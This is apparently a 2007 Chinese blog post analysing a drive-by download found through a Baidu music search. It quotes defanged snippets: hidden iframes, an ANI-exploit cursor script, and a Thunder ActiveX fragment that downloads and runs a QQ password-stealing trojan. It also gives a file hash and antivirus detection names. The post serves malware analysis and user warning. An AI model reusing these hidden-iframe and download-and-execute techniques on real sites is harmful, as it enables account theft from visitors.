小心!用baidu搜索 得了音乐 失了QQ 原来搭送了Trojan.PSW.Win32.QQPass.qis
来源:互联网 发布:上海大学乐乎登陆 编辑:程序博客网 时间:2024/04/29 08:11
endurer 原创
2007-07-01 第1版
有一位网友反映,他用baidu搜索音乐,打开搜索结果中的链接网页后,QQ号被盗~
BTW,偶找音乐都是用sogou的~
检查网友提供的这个网页,发现包含代码:
/---
<iframe src='hxxp://w**.c**yshop.net/gg.html?id=101' width=0 height=0></iframe>
---/
hxxp://w**.c**yshop.net/gg.html?id=101中包含三段恶意代码。
一、US-ASCII 编码的内容
到 http://purpleendurer.ys168.com 下载 US-ASCII 编码解码器进行解码,得到一段HTML代码:
/---
<BODY style='CURSOR: url(hxxp://*q*.16***80*8*0.com/w.js)'>
</BODY>
---/
w.js 利用 ANI 漏洞 下载 hxxp://w**.d**zy5***20.com/0.exe
文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-1 21:55:38
修改时间 : 2007-7-1 21:55:44
访问时间 : 2007-7-1 0:0:0
大小 : 22807 字节 22.279 KB
MD5 : 08a5179fc115b3ace5c9a4ac55ed4c44
Kaspersky 报为 Trojan-PSW.Win32.Delf.qc,瑞星报为 Trojan.PSW.Win32.QQPass.qis
二、HTML代码:
/---
<iframe src="hxxp://q**.z**p*x5**2*0.com/1.htm" width=0 height=0></iframe>
---/
1.htm 的内容使用了 US-ASCII 编码,解码,得到一段JavaScript代码,功能同样是下载 上面这个0.exe
三、HTML代码:
/---
<iframe src="hxxp://q**.z**p*x5**2*0.com/vip.htm" width=0 height=0></iframe>
---/
hxxp://q**.z**p*x5**2*0.com/vip.htm 内容为:
/---
<SCRIPT src="vip.js"></SCRIPT>
<BODY onload=shit();><BR><BR>
---/
shit()定义在vip.js中:
/---
function shit()
{
try{qianxu_fan = new ActiveXObject("ThunderServer.webThunder.1");}
catch(e){return;}
---/
用来创建ActiveX Object:ThunderServer.webThunder.1。
vip.js 利用它来的实施:
利用ADODB创建文件:C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta
利用Shell.Run调用IE打开网页 hxxp://q**.d*z**y*5***20.com/vips.htm,下载病毒文件vip.exe
利用shell.exec运行下载到IE临时文件夹中的病毒文件vip[1].exe
hxxp://q**.d*z**y*5***20.com/vips.htm 包含代码:
/---
<script src="vip.exe"></script>
---/
vip.exe 与 上面的 0.exe 相同。
- 小心!用baidu搜索 得了音乐 失了QQ 原来搭送了Trojan.PSW.Win32.QQPass.qis
- 装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗1
- 装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗2
- 遭遇Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.QQPass等
- Trojan-PSW.Win32.QQPass.ro通过QQ信息中网页传播
- 遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1
- 遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等2
- 遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1
- 遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等2
- 又遇Trojan.PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1
- 又遇Trojan.PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等2
- 遭遇 unixsys08.sys/Trojan-PSW.Win32.QQPass.cdw,Trojan-PSW.Win32.OnLineGames等1
- 遭遇_unixsys08.sys/Trojan-PSW.Win32.QQPass.cdw,Trojan-PSW.Win32.OnLineGames等2
- 03-29/小心QQ信息中的网址传播Trojan-PSW.Win32.Delf.qc/Trojan.PSW.Liumazi.kr(2版)
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等
- 遭遇将系统时间改为2000-10-18的Trojan.PSW.Win32.QQPass.qii,Trojan.PSW.Win32.OnlineGames.cql等
- 小心QQ上传播的 1407.rar / 我的照片.Exe /Trojan-PSW.Win32.Delf.agh/Worm.Win32.PaBug.cn
- 热烈庆祝香港回归10周年
- 今天
- 替Java应用程序的“容貌”平反
- CS服务器安装
- 日记(2007-07-01)
- 小心!用baidu搜索 得了音乐 失了QQ 原来搭送了Trojan.PSW.Win32.QQPass.qis
- 7-Hibernate 持久化对象
- 《Pro Spring》学习笔记之使用properties文件进行依赖注入
- Python游戏:PyGame(转自韩宪平的博客)
- .NET 访问 Oracle 数据库相关
- 如何在BLOG中加入视频
- 触摸屏的工作模式探寻 in search touchscreen inside
- 蓝筹股
- 我的C程序,学了两天,就让我弄这么一个几百行的程序,还没有做完,过两天放假继续写,感兴趣的可以看看哦